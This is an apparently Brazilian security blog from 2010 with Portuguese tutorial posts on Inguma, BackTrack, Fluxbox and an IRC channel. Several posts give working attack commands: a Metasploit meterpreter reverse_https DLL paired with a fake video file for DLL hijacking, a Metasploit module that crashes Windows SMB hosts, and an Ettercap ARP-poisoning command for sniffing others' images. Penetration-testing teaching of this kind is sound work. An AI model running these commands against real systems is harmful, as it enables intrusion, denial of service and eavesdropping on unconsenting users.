banner468

domingo, 28 de novembro de 2010

Inguma - Penetration Testing Toolkit - Autoscan


Inguma e um kit de ferramentas de descoberta de vulnerabilidade inteiramente escrita em Python. Seu framework inclui módulos para descoberta de hosts, recolher informações, fuzz targets, força bruta (brute-force), exploits e disassembler.
Os módulos de varredura do inguma são divididos em 5 partes, alem de um autoscan.
Os módulos são "Descobrir", "Reunir", "Força bruta", "Exploits". Inguma pode ser executado em sua própria base python em modo gráfico e pelo terminal.

Nessa aula vou mostrar o uso do autoscan, as demais funções mostro em aulas futuras. Com as informações colhidas eu logo no sistema alvo por ssh.

Sobre o Vídeo:
Tamanho:  6.2 MB
Formato:  MP4
Duração:  3:29 min
Musica: Hip-Hop - Shift Piano
Baixar: http://www.4shared.com/file/xaXM7rxy/Inguma-autoscan.html
On line: http://vimeo.com/17272324



Ref:
http://inguma.sourceforge.net

Dll Hijacking em Windows 7


Nessa aula vou mostrar a técnica de dll hijacker, ela consiste em colocar ou substituir uma dll padrão do sistema operacional por uma dll maliciosa. Uma vez que a dll maliciosa tenho sido modificada, e necessário que ela esteja na mesma pasta do arquivo vulnerável ou substituída o arquivo original na maquina alvo, essa falha e antiga e já vem sendo discutida a mais de 10 anos. Não vou alongar muito o texto, caso queiram saber mais informações, leia as referencias abaixo.
Nesse link você vão pode encontrar uma lista de DLL´s vulneráveis e seus respectivos programas:
http://www.exploit-db.com/dll-hijacking-vulnerable-applications/

Na vídeo aula, crio uma dll maliciosa e um aquivo de vídeo  falso. Fiz de forma simples, não deixei a dll oculta para o melhor entendimento da vídeo, mas para esse ataque se bem sucedido deve envolver um pouco de engenharia social.

Comandos:
msfpayload windows/meterpreter/reverse_https LHOST=IP LPORT=443 D > /Diretório para ser salvo o arquivo/ehtrace.dll
touch Video.flv
use multi/handler
set lhost IP
set lport 443
set payload windows/meterpreter/reverse_https
exploit


Sobre a aula:
Tamanho: 69 Mb
Formato: AVI
Duração: 4:29
Musica: Hip-Hop – Hot shif once again
Baixar: http://www.4shared.com/file/yqv2OQRJ/Dll-hijacker_Windows_7_.html
On line: http://vimeo.com/17250307





REF:
http://en.wikipedia.org/wiki/DLL_Hijacking
http://www.exploit-db.com/dll-hijacking-vulnerable-applications/
http://en.wikipedia.org/wiki/Dynamic-link_library
http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html
http://www.rec-sec.com/2009/05/12/dll-hijacking-vulnerability/
http://www.informationweek.com/news/windows/security/showArticle.jhtml?articleID=228200659

segunda-feira, 22 de novembro de 2010

BackTrack 4 R2


Chegou a nova atualização - para um novo kernel, e uma nova versão do BackTrack. Com o codinome "Nemesis". Esta versão é a nossa melhor versão, é ainda com maior agilidade de resposta da área de trabalho, melhor suporte a hardware, suporte mais amplo placa wireless, ambiente de trabalho simplificado.

Novas funções:

    * Kernel 2.6.35.8 – *Much* improved mac80211 stack.
    * USB 3.0 support.
    * New wireless cards supported.
    * All wireless Injection patches applied, maximum support for wireless attacks.
    * Even *faster* desktop environment.
    * Revamped Fluxbox environment for the KDE challenged.
    * Metasploit rebuilt from scratch, MySQL db_drivers working out of the box.
    * Updated old packages, added new ones, and removed obsolete ones.
    * New BackTrack Wiki with better documentation and support.
    * Our most professional, tested and streamlined release ever.


Para aqueles que querem atualizar uma versão mais antiga do BT4:
http://www.backtrack-linux.org/wiki/index.php/Upgrading

Referencias:

quarta-feira, 17 de novembro de 2010

Projeto Request777

Estou com um projeto novo.

Reunindo uma equipe de amigos e profissionais na área de segurança digital, para prover material de qualidade e atualizado.

Tutoriais
Vídeo aulas
Artigos
Podcasts
Noticias
Cursos
Etc...


Site em construção...

Em breve nesse endereço: http://www.request777.com.br/

Equipe Request777

domingo, 7 de novembro de 2010

Denial of Service em Windows (DoS)

_| Introdução |_
Olhando alguns auxiliares do mestasploit, resolvi procurar algum pra DoS.
O que encontrei e para ataque em rede local, pesquisando um pouco mais sobre essa falha, descobri que módulo explora uma falha no SRV.Sys driver do sistema operacional Windows.

É afetas as versões do Windows:
Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP Gold 0
Microsoft Windows XP Embedded SP1
Microsoft Windows XP Embedded
Microsoft Windows XP 64-bit Edition Version 2003 SP1
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows XP 0
Microsoft Windows Server 2003 Web Edition SP1 Beta 1
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1 Beta 1
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Advanced Server SP4

_| Comandos |_
nmap -O 192.168.1.1/24 
msfconsole
use dos/windows/smb/ms06_063_trans
set lport 445 (Essa opção vem configurada por padrão)
run

_| Sobre a vídeo |_
Tamanho:  18.7 Mb
Formato: AVI
Duração: 4:35
Musica: Afoga o ganso - Turma da 98
Baixar: http://www.4shared.com/file/UX4fFsVH/DOS-Windows.html




_| Referencias |_
http://pt.wikipedia.org/wiki/Ataque_de_nega%C3%A7%C3%A3o_de_servi%C3%A7o
http://www.osvdb.org/27644
http://www.microsoft.com/technet/security/bulletin/MS06-063.mspx
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-3942
http://www.securityfocus.com/bid/19215
http://www.metasploit.com

Driftnet & Ettercap (Farenjando JPEG)

Introdução \___
O driftnet, foi inspirado no Etherpeg(para SO Apple Macintosh), o Driftnet fareja e decodifica qualquer JPEG em sessões TCP, visto por qualquer pessoal em sua rede. O programa esta no estagio inicial de desenvolvimento, e sobre a licença GNU/GPL, ainda da para fazer umas modificações, desde o farejamento de áudio. No menu do programa, a outra configuras que vocês podem vasculhar, e ate mesmo salva as imagens capturas.
Para que o Driftnet pudesse captura as imagens de minha rede, eu usei o Ettercap.

Comandos \__
driftnet -h
driftnet -i eth0
ettercap -T -Q -M arp -i eth0(interface de rede) // //

Sobre o vídeo \__
Tamanho: 23,9 Mb
Formato: AVI
Duração: 4:27
Musica: Só Os Loucos Sabem - Charlie Brown Jr.
Baixar: http://www.4shared.com/file/8DcnrxbU/DriftnetEttercap.html




Referencias \__
http://www.ex-parrot.com/~chris/driftnet/
http://backtrack.offensive-security.com/index.php/Tools
http://ettercap.sourceforge.net/
http://en.wikipedia.org/wiki/Ettercap_%28computing%29

sábado, 6 de novembro de 2010

Iniciando o FluxBox no BackTrack 4 R1

Ola pessoal, fiz uma vídeo aula simples de como iniciar o fluxbox no BackTrack 4.

Informações sobre o gerenciador de janelas FluxBox:
http://pt.wikipedia.org/wiki/FluxBox
http://fluxbox.org/
__________
Comandos: |______
dragon
desktop fluxbox
flux-for-back -s
desktop kde
reboot
_____________
Sobre o Video: |_____
Formato: AVI (.rar)
Tamanho: 19.3 Mb
Duração: 8:58 min
Musica: Stromae - Alors on danse
Baixar: http://www.4shared.com/file/yITjCcXG/fluxbox-bt4.html


Duvidas e sugestões, reporte abaixo.

terça-feira, 2 de novembro de 2010

Acessando o canal de IRC do Blog

Nesse mini tutorial, usei o Xchat.
Pode ser baixado no site oficial: http://xchat.org/download/

1° Passo, Clique no ícone do Xchat, e escolha o servido da FreeNode, aperte ligar:



2° passo, Apos a autenticação no servidor, digite o canal do blog "remote-execution", no campo e "OK"


3° Passo, a tela da sala, e onde você pode iniciar o bate papo com usuários on-line.



Sempre que possível, estarei on line na sala, onde ponderam troca idéias, da sugestões, opiniões e etc...

Caso usem outro cliente de irc.
Para entrar no servidor:
/server irc.freenode.net

Para entrar na sala:
/join #request

Canal foi alterado para request

 

Subscribe to our Newsletter

Contact our Support

Email us: youremail@gmail.com

Our Team Memebers